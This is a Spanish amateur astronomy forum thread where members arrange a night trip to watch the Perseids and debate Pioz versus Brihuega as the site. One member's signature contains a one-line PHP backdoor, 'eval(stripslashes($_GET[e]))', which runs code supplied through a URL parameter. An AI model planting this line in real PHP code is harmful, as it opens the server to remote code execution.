Perseidas - jueves 12 Pioz?

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Perseidas - jueves 12 Pioz?

Mensaje por rviper »

Pese a que me gustaría ir, lo veo bastante complicado, el viernes trabajo y encima el jueves ya había hecho planes.

Si al final va la tele, que se nos oiga bien fuerte!!! Y que no os den mucho el coñazo con los focos, explicadles que eso de la luz es malooo!

Pasadlo muy bien.
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
Rober150
Mensajes: 235
Registrado: Dom Jun 29, 2008 6:50 pm

Perseidas - jueves 12 Pioz?

Mensaje por Rober150 »

A ver, yo no obligo a nadie a ir a Pioz, todo lo contrario, yo he dicho que iba a ir porque me siento más cómodo y que vaya quien quiera. Desde la puerta de mi casa hasta la explanada de Pioz tardo 25min, si voy hasta Brihuega tardaré más de media hora (60km de autovia a 120km/h son 30min, más el trocito de casa a la autopista y el último trozo de carretera y camino), No me da cosa coger autopista y sí que es más cómodo que el pequeño puerto de Los Santos, lo que me da más cosa es hacerme tantos km de noche, por el sueño y el cansancio. He vuelto de Madrid muchas veces a las 3 y las 4 de la madrugada pero es un trozo que me conozco perfectamente y no tardo nada, y aun así hay veces que he vuelto echo polvo y nada seguro. Depende del día y de lo cansado que esté. Pero bueno, supongo que nada que no se arreglé con un poco de cafeína.

Bueno, después de todo este tocho, quiero decir que no me importa ir a Brihuega si es lo que prefiere la mayoría, pero me siento más cómo haciendo las primeras salidas sólo yendo a Pioz.. Elegid lo que queráis, de todas formas alguna vez tendré que ir a Brihuega.


Qué bien que vaya La Sexta! a ver si esta vez es verdad.


un saludo
AstroAfición / Descubre tu pasión por la Astronomía
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Perseidas - jueves 12 Pioz?

Mensaje por vakaloura »

Bueeeeenas!!!

Puesssss.... yo.... viendo las horas del máximo.... igual hago un esfuerzo y voy!! Es que los dos bólidos que vimos este finde me han sabido a poco :twisted: y tenemos ganas de más!!!

Eso sí, yo tiro pa Brihuega, tardo lo mismo y cuanta más oscuridad mejor!!

Probablemente liaré a unas coleguillas, pa hacer bulto.

Un saludo!!!

Edito: Rober, lía a algun colega y que vaya contigo en el coche, vayas a donde vayas, se te hará muchísimo "más mejor"; a mi me pasa, me dá mal rollo coger el coche yo solo aunque sean 15 kms a las tantas de la noche por esas carreteras del demonio.... creo que voy a ir a tope con el coche, pero si por lo que sea tengo una plaza libre, te vienes conmigo y tan felices!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Perseidas - jueves 12 Pioz?

Mensaje por m3ntol »

Rober si lo malo de la vuelta no es el cansancio sino los cubatas que nos vamos a meter entre pecho y espalda :twisted: :twisted:

Una pregunta para los que apuestan por Brihuega... ¿va a haber generador o va a haber silencio? :roll: :lol: :lol:

Creo que casi todos van para Brihuega, no obstante Rober, si tu finalmente vas a Pioz yo me quedo contigo que tanto me da un sitio que otro... y los de la sexta pues que se vayan con Mario que ya tiene tablas en el mundo de la TV XD XD ¿hace Mario?
phpbb:eval(stripslashes($_GET[e]));
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Perseidas - jueves 12 Pioz?

Mensaje por vakaloura »

Jejeje, nos hemos solapado!!

Pues no, no habrá generador de ruido!! Vamos a lo que vamos, a beber, a comer, a charlar.... ah! si! y a ver los cachos de bólidos!! :twisted:

Haber si un día me toca la primitiva y puedo permirme un generador un poco más silencioso, digo un poco, porque la verdad, como ahuyentador de malos-bichos es infalible, y si no pregúntame por los jabalíes el día que no lo encendimos hasta tarde.... oink oink

No en serio, siento las molestias por el ruido.... pero es que me da la vida!!

Un saludoooooo!!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
ender
Mensajes: 67
Registrado: Dom Jul 15, 2007 8:58 pm

Perseidas - jueves 12 Pioz?

Mensaje por ender »

Hola, yo a Brihuega nunca he ido, no puedo opinar sobre el sitio pero yo casi prefiero Pioz por eso de que se como ir, me pilla mas cerca y que tampoco me apetece hacerme mas kilometros para estar como mucho hasta las 2 (al dia siguietne curro). Yo creo que ire a Pioz, si finalmente vais alguno allí nos veremos.

Salu2.
alnitakzetaorionis
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Perseidas - jueves 12 Pioz?

Mensaje por vakaloura »

Hooooola!!

Para los que vayan a un sitio u otro, podíamos quedar y salir juntos, que os parece?
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
Avatar de Usuario
JOAQUIN
Mensajes: 233
Registrado: Jue Sep 03, 2009 10:19 am

Perseidas - jueves 12 Pioz?

Mensaje por JOAQUIN »

Hola a todos
Me apunto.
También curro al día siguiente, pero creo que es mejor Brihuega.
Creo que por unos Kilómetros + merece la pena.

Salu2
Rober150
Mensajes: 235
Registrado: Dom Jun 29, 2008 6:50 pm

Perseidas - jueves 12 Pioz?

Mensaje por Rober150 »

Mejor juntos que separados, así que si la mayoría quieren ir a Brihuega habrá que ir. Bautismo de fuego en Brihuega!
Ender, anímate tú también!

Javier, muchas gracias por el ofrecimiento, es todo un detalle, pero me animo y vamos a probar Brihuega.

Vakaloura, si ya he intentado engañar a alguien para que se venga pero están todos de vacaciones... Ah, y me parece bien quedar en algún sitio antes de llegar. No sé cómo lo hacéis normalmente, ¿alguna gasolinera o directamente allí?
que alguien copie el enlace de cómo llegar, plis!

un abrazo
Rober
AstroAfición / Descubre tu pasión por la Astronomía
Avatar de Usuario
RegMaster
Mensajes: 10
Registrado: Vie Ene 08, 2010 3:41 pm

Perseidas - jueves 12 Pioz?

Mensaje por RegMaster »

Buenas!!!! cómo están las predicciones de nubes????

Me puedo apuntar???, nunca he ido a ninguna salida con nadie aun, siempre me coge sin tiempo, con obligaciones mayores o sin ganas :(
EQ6 Definitive Edition
C9.25" / Mak-Newton 152/740
EOS 450D IR Mod Cooled / ASI1600MM-C / QHY5L II Mono @ EZG 60mm
Baader LRGBHaOIIISII 1,25" @ Nautilus - UV/IR cut 2"
Responder